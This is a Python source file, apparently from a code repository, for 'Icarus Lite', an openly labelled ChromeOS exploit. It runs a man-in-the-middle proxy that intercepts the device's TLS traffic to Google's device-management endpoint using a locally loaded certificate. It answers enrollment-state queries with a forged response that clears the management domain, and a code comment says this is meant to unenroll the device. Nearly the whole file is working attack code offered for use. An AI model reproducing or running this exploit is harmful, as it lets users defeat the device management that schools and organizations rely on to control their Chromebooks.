255 lines
11 KiB
Python
255 lines
11 KiB
Python
"""
|
|
Icarus Lite v1.0
|
|
Written by cosmicdevv
|
|
|
|
Description:
|
|
Icarus Lite is a simple and lightweight version of the Icarus ChromeOS exploit initially written in NodeJS by Writable/Unretained/MunyDev.
|
|
|
|
The goal of Icarus Lite is to simplify the codebase and make it easier to understand and modify. Icarus Lite is
|
|
|
|
How Icarus/Icarus Lite work:
|
|
ill write later lol
|
|
|
|
"""
|
|
|
|
import os
|
|
import time
|
|
import socket
|
|
import ssl
|
|
import shutil
|
|
import threading
|
|
import select
|
|
import re
|
|
import requests
|
|
import http.server
|
|
import urllib.request
|
|
import urllib.parse
|
|
from dmbackend import device_management_pb2
|
|
|
|
pInitial = 3001 # The port that MiniServers will start up from.
|
|
certPaths = {} # Stores paths of certificates on the local filesystem
|
|
|
|
# Custom function to print text with color to enhance user experience while reducing dependies (such as Colorama) that are needed
|
|
def colorprint(text, color):
|
|
if color == "blue":
|
|
print(f"\033[34m{text}\033[0m")
|
|
elif color == "green":
|
|
print(f"\033[32m{text}\033[0m")
|
|
elif color == "red":
|
|
print(f"\033[31m{text}\033[0m")
|
|
|
|
# unlike normal icarus which calls other files and shit to create a miniserver, we can do it easily in icarus Lite!!!!!
|
|
class MiniServerHandler(http.server.SimpleHTTPRequestHandler):
|
|
def log_message(self, format, *args):
|
|
pass # Since we have our own logging, we don't need the HTTP server to log requests it recieves
|
|
|
|
def do_GET(self):
|
|
colorprint("GET request recieved, ignoring.\n\n", "blue")
|
|
self.send_response(200)
|
|
self.wfile.write(b"OK")
|
|
|
|
def do_POST(self):
|
|
# Slightly rewritten part of dmbackend
|
|
# Get the body content of the request from the client
|
|
body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
|
|
# Create a dmr object
|
|
dmr = device_management_pb2.DeviceManagementRequest()
|
|
dmr.ParseFromString(body)
|
|
# Declare status_code and resp which are used for the response later.
|
|
status_code = 0
|
|
resp = None
|
|
# all the magic originally by writable
|
|
if (dmr.HasField("device_state_retrieval_request")):
|
|
status_code = 200
|
|
resp = device_management_pb2.DeviceManagementResponse()
|
|
rr = resp.device_state_retrieval_response
|
|
dv = device_management_pb2.DeviceInitialEnrollmentStateResponse()
|
|
dv.Clear()
|
|
dv = rr.initial_state_response
|
|
dv.initial_enrollment_mode = 0
|
|
dv.management_domain = ""
|
|
dv.is_license_packaged_with_device = False
|
|
dv.disabled_state.message = ""
|
|
rr.restore_mode = 0
|
|
rr.management_domain = ""
|
|
print(dmr)
|
|
else:
|
|
con = requests.post("https://m.google.com/devicemanagement/data/api?" + urllib.parse.urlparse(self.path).query, data=body, headers=dict(self.headers))
|
|
status_code = con.status_code
|
|
resp = device_management_pb2.DeviceManagementResponse()
|
|
resp.ParseFromString(con.content)
|
|
print(con)
|
|
# Send the response back to the client, which unenroll the device
|
|
self.send_response(status_code)
|
|
self.send_header("Content-Type", "application/x-protobuffer")
|
|
self.send_header("Content-Length", str(len(resp.SerializeToString())))
|
|
self.end_headers()
|
|
self.wfile.write(resp.SerializeToString())
|
|
colorprint("Successfully intercepted request.\n\n", "green")
|
|
|
|
|
|
class MiniServer:
|
|
def __init__(self):
|
|
# Create a mini HTTP/HTTPS server.
|
|
global pInitial
|
|
self.port = pInitial
|
|
handler = MiniServerHandler
|
|
handler.server = self
|
|
# Keep trying to create the server in case some ports are already in use, in which case the code will increment the port and try again.
|
|
while True:
|
|
try:
|
|
self.httpd = http.server.HTTPServer(("0.0.0.0", self.port), handler)
|
|
break
|
|
except OSError:
|
|
pInitial += 1
|
|
self.port = pInitial
|
|
continue
|
|
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
|
|
context.load_cert_chain(certfile="./certs/google.com.pem", keyfile="./certs/google.com.key")
|
|
self.httpd.socket = context.wrap_socket(self.httpd.socket, server_side=True)
|
|
pInitial += 1
|
|
threading.Thread(target=self.httpd.serve_forever).start() # Start the server in a separate thread so it doesn't block the main thread.
|
|
|
|
|
|
def handle_client(client_socket, address):
|
|
# Initial request buffer
|
|
colorprint("// HANDLING REQUEST \\\\", "blue")
|
|
host = None
|
|
port = 0
|
|
is_tls = False
|
|
is_filtered = False
|
|
request = b""
|
|
|
|
# Gets all the request data (we while loop this incase the request is larger than 1 packet, and the loop ends once the end of the request is reached)
|
|
while b"\r\n\r\n" not in request:
|
|
data = client_socket.recv(4096) # Recieve 1 packet with the buffer size of 4096 bytes
|
|
request += data # Add the newly retrieved data to the stored request data
|
|
|
|
# Split and decode the request data
|
|
request_line = request.split(b"\r\n")[0].decode("utf-8")
|
|
if request_line.startswith("CONNECT"): # CONNECT means it's a TLS request
|
|
is_tls = True
|
|
_, target, _ = request_line.split(" ", 2)
|
|
host, port = target.split(":", 1)
|
|
port = int(port)
|
|
else: # If CONNECT isn't in the request_line, it's not a TLS request, and we handle it differently
|
|
is_tls = False
|
|
method, path, _ = request_line.split(" ", 2)
|
|
# Get the host from the request data
|
|
for line in request.split(b"\r\n")[1:]:
|
|
if line.startswith(b"Host: "):
|
|
host = line[6:].decode("utf-8")
|
|
break
|
|
# If a host isn't found, the request is probably malformed
|
|
if not host:
|
|
client_socket.close()
|
|
return
|
|
# If the host specifies a port to use, we'll retrieve it.
|
|
if ":" in host:
|
|
host, port = host.split(":", 1)
|
|
port = int(port) # Ensure the host is an integer and not a string
|
|
else: # If no port is specified, we'll use the default port for a non-TLS request (which is 80)
|
|
port = 80
|
|
|
|
# Check if the host is filtered
|
|
if re.match(r"m\.google\.com", host):
|
|
is_filtered = True
|
|
|
|
# Console logging
|
|
colorprint("Server Address: " + str(host), "blue")
|
|
colorprint("Is TLS (HTTPS) connection: " + str(is_tls), "green" if is_tls else "red")
|
|
colorprint("Is filtered? " + str(is_filtered), "green" if is_filtered else "red")
|
|
|
|
# If it's filtered and it's a TLS request, we'll have to send the request to our own server so we can intercept it
|
|
if is_filtered and is_tls:
|
|
# Create a new MiniServer,
|
|
miniserver = MiniServer()
|
|
# Create a server socket to communicate with the Miniserver
|
|
miniserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
miniserver_socket.connect(("127.0.0.1", miniserver.port))
|
|
# Acknowledge the request, then pipe the client to the MiniServer
|
|
client_socket.sendall(b"HTTP/1.1 200 Connection Established\r\n\r\n")
|
|
try:
|
|
pipe = tunnel_traffic(client_socket, miniserver_socket)
|
|
# If tunnel closed on first packet (client likely rejected connection)
|
|
if not pipe:
|
|
colorprint("ERROR: The client may have rejected the connection. This is usually an SSL issue.", "red")
|
|
except Exception as e:
|
|
colorprint(f"ERROR: {e}\nThe client may have rejected the connection.", "red")
|
|
colorprint("Have you ran the Icarus shim on the target Chromebook?", "blue")
|
|
return
|
|
# The below only runs if the host isn't filtered (or it is filtered but not a TLS request, in which case we won't intercept it)
|
|
try:
|
|
# Create a connection to the host server
|
|
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
server_socket.connect((host, port))
|
|
if is_tls:
|
|
# If it's a TLS request, we'll acknowledge the request so the tunnel between the client and server can be established shortly
|
|
client_socket.sendall(b"HTTP/1.1 200 Connection Established\r\n\r\n")
|
|
else:
|
|
# If it's not a TLS request, we'll forward all the data from the client to the server
|
|
server_socket.sendall(request)
|
|
# Same as .pipe() in NodeJS but we have to do it a bit differently.
|
|
try:
|
|
pipe = tunnel_traffic(client_socket, server_socket)
|
|
except Exception as e:
|
|
colorprint(f"ERROR: {e}\nUnknown failure tunneling traffic.", "red")
|
|
except Exception as e:
|
|
colorprint(f"Error connecting to {host}:{port} - {e}", "red")
|
|
client_socket.close()
|
|
return
|
|
print("\n\n") # New lines for next request
|
|
|
|
def tunnel_traffic(client_socket, server_socket):
|
|
# Because Python does not have a built-in .pipe() method like NodeJS, we have to do this manually.
|
|
client_socket.setblocking(0)
|
|
server_socket.setblocking(0)
|
|
while True:
|
|
readable, _, exceptional = select.select([client_socket, server_socket], [], [client_socket, server_socket], 60)
|
|
if exceptional:
|
|
break
|
|
for sock in readable:
|
|
peer_sock = server_socket if sock is client_socket else client_socket
|
|
# normally we'd put a try catch exception here but i want it to raise an error when there is one
|
|
data = sock.recv(4096)
|
|
if not data:
|
|
# If it's the first packet or something, return False for error handling purposes
|
|
if readable.index(sock) == 0:
|
|
return False
|
|
return True
|
|
first = False
|
|
peer_sock.sendall(data)
|
|
client_socket.close()
|
|
server_socket.close()
|
|
|
|
colorprint("Icarus Lite v1.0", "blue")
|
|
colorprint("Written by cosmicdevv", "blue")
|
|
colorprint("Improved by kxtzownsu", "blue")
|
|
|
|
port = 8126
|
|
proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
proxy_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
|
proxy_socket.bind(("0.0.0.0", port))
|
|
proxy_socket.listen(100)
|
|
|
|
# Get the local IP for the user
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
|
s.connect(("8.8.8.8", 1))
|
|
local_ip = s.getsockname()[0]
|
|
s.close()
|
|
|
|
colorprint(f"Icarus Lite is running on: {local_ip}:{port}", "green")
|
|
while True:
|
|
try:
|
|
client_socket, client_address = proxy_socket.accept()
|
|
client_thread = threading.Thread(target=handle_client, args=(client_socket, client_address))
|
|
client_thread.daemon = True
|
|
client_thread.start()
|
|
except KeyboardInterrupt:
|
|
print("Icarus Lite is shutting down...")
|
|
proxy_socket.close()
|
|
break
|
|
except Exception as e:
|
|
print(f"Error accepting connection: {e}")
|
|
proxy_socket.close()
|